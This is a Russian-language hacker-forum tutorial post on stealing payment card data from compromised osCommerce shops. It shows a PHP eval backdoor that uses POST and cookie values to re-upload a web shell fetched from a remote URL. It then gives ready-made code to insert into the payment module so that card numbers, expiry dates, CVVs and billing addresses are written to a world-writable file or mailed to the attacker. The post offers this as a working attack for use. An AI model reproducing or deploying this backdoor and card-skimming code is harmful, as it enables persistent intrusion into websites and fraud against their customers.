Хакерский софт, программирование и различные услуги
Старый 18.10.2015, 14:54   #1
xdedic
Залётный
 
Регистрация: 03.10.2015
Сообщений: 7
xdedic на пути к лучшему
По умолчанию Перехватываем картон and etc...

В предыдущей части мы заливали шелл, теперь на нужно внедрить свой код (бэкдор), нужно это чтобы когда злой админушка удалил шелл и залатал дыры, мы смогли с легкостью перезалить шелл заново.
В интернете существует множество бэкдоров, чтобы было меньше палева в лог файлах рекомендую использовать post, cookie бэкдоры. Это значит что ваш зловещий код будет использоваться через пост либо куки, давайте разбере на примере.
К примеру имеем бэкдор:
Код:

eval($_POST['sys_call']);

Ищем доступные на запись файлы, к примеру login.php и после <? можете вставлять наш код.
Сохраняем. Теперь ваш бэкдор доступен по адресу к примеру site.com/login.php
Открываем оперу. Кликаем правой кнопокй -> исходный код (или ctrl + U)
убираем все лишнее и вставляем
Код:

<form method="POST"><textarea name="sys_call"></textarea><input type="submit"></form>

нажимаем применить изменения


Теперь на нашей вкладке будет окошко для вставки нашего зловещего php кода.
К примеру напишем
Код:

phpinfo();



и кликаем отправить.
В итоге получаем phpinfo нашего сайта.
Чтобы перезалить наш шелл, нам необходим полный путь сайта до папки с правами на запись, чтото типа:
Код:

/www/site.de/home/tmp

Вставляем в окно:
Код:

copy($_COOKIE[ev2],$_COOKIE[ev3]);

Кликаем правой кнопкой > Настройки для сайта > Cookies
Выбираем любую строку и кликаем изменить, в поле имя пишем ev2 в значение http://site.com/shell.txt где лежит наш шелл в txt



жмем ок, выбираем следующую строку и снова изменить, в поле имя ставим ev3 в поле значение ставим полный путь до папки с именем шелла /www/site.de/home/images/shell.php



Жмем везде ОК.
И жмем отправить, в итоге наш шелл будет доступен по адресу http://site.de/images/shell.php
Это описан лишь один из бэкдоров, никто не запрещает вам использовать другие.

Теперь поговорим как собирать картон если он не записывается в базу.
Для начала узнаем какой файл используется как оплата картонкой, в osCommerce это можно узнать в разделе
Modules
-Payment Systems



по умолчанию все модули оплаты на этом движке находятся на /dev/www.site.com/htdocs/includes/modules/payment/
идем на шелле по этому пути и видим наш cc.php
Редактируем его.

Код:

$result = $cc_validation->validate($_POST['cc_number'], $_POST['cc_expires_month'], $_POST['cc_expires_year']);

Видим что данные карты передаются методом POST.
После этой строки вставляем наш ГОТОВЫЙ код (Если просмотреть файл полностью мы увидим все переменные которые были вставлены)
Код:

$BASE="/dev/www.site.com/htdocs/includes/cc.txt";
$p0=$_POST['cc_owner'];
$p1=$_POST['cc_number'];
$p2=$_POST['cc_expires_month'];
$p3=$_POST['cc_expires_year'];
$p4=$_POST['cc_cvv'];
$p5=$order->billing['street_address'];
$p6=$order->billing['city'];
$p7=$order->billing['postcode'];
$p8=$order->billing['state'];
$p9=$order->billing['country']['iso_code_2'];
$info="$p0|$p1|$p2/$p3|$p4|$p5|$p6|$p7|$p8|$p9\n";
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);

Многие уже поняли что наши картонки будут храниться по адресу www.site.com/includes/cc.txt
не забудьте поставить права на файл cc.txt 0777 (chmod 0777)
Но многим по душе мыло. Для отправки по емайл вставляем такой код
Код:

$p0=$_POST['cc_owner'];
$p1=$_POST['cc_number'];
$p2=$_POST['cc_expires_month'];
$p3=$_POST['cc_expires_year'];
$p4=$_POST['cc_cvv'];
$p5=$order->billing['street_address'];
$p6=$order->billing['city'];
$p7=$order->billing['postcode'];
$p8=$order->billing['state'];
$p9=$order->billing['country']['iso_code_2'];
$info="$p0|$p1|$p2/$p3|$p4|$p5|$p6|$p7|$p8|$p9\n";
mail("mail@yahoo.com", "", $info);

Где mail@yahoo.com ваш email
Я пользуюсь yahoo, мыло живет больше года)

Также в соседней теме h4v1 предложил такой код
Код:

<?php
if($_POST['PAY']) {
$_POST['creditcard']
$to = 'forme.com';
mail($to, $title);
}
?>

Не забудьте добавить свои переменные.
Каким пользоваться решать вам. Главное понять каким методом передается данные о картоне (post, get) и какие имена у номера карты exp и т.д., все это можно узнать в исходниках.
Отвечу на все интересующие вопросы в этой теме.

©f1rst for Net$ky

http://netsky.pw/showthread.php?t=2497

Последний раз редактировалось xdedic; 18.10.2015 в 16:50.
xdedic вне форума   Ответить с цитированием
DDOS УСЛУГИ Реклама на форуме хакеров. Расценки на рекламу.
Ответ


Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Текущее время: 15:39. Часовой пояс GMT +3.

Powered by SoftXaker® Version 3.5.1
Copyright ©2000 - 2017, Форум хакеров и программистов: Forum.SoftXaker.ru